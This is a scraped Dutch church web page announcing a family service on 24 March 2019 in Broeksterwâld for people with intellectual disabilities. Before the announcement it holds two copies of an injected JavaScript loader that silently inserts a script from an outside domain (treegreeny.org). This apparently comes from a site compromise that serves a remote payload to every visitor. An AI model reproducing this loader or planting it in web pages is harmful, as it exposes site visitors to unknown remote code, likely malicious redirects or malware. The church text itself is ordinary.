;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Bijzondere gezinsdienst ... uitnodiging ! - PKN Damwâld
24 maart 2019
14:00 t/m 15:00
Christelijk Gereformeerde Kerk Petrusgemeente Broeksterwâld
Bijzondere gezinsdienst … uitnodiging !

Zondagmiddag 24 maart 2019 wordt  in de Chr. Gereformeerde kerk Petrusgemeente, Kavelwei 39 Broeksterwâld  een bijzondere gezinsdienst gehouden. De dienst begint om 14.00 uur. Ds. A. Mak gaat in op het thema ‘Je hoeft niet bang te zijn’. Een aantal catechisanten en de muziekgroep Gryn werken mee aan de dienst Van harte welkom !

Geregeld wordt in een aantal kerken in Damwâld en omgeving aangepaste gezinsdiensten gehouden die met name gericht zijn op de mensen met een verstandelijke beperking. Deze diensten, waarvan er gemiddeld 5 per jaar zijn, worden beurtelings verzorgd door één van de kerken die zijn vertegenwoordigd in de Commissie Gezinsdiensten. Deze diensten kenmerken zich door de heldere en zeer begrijpelijk taal en zijn ook uitermate geschikt voor kinderen.

Locatie: Christelijk Gereformeerde Kerk Petrusgemeente BroeksterwâldKavelwei 39, 9108 MC Broeksterwald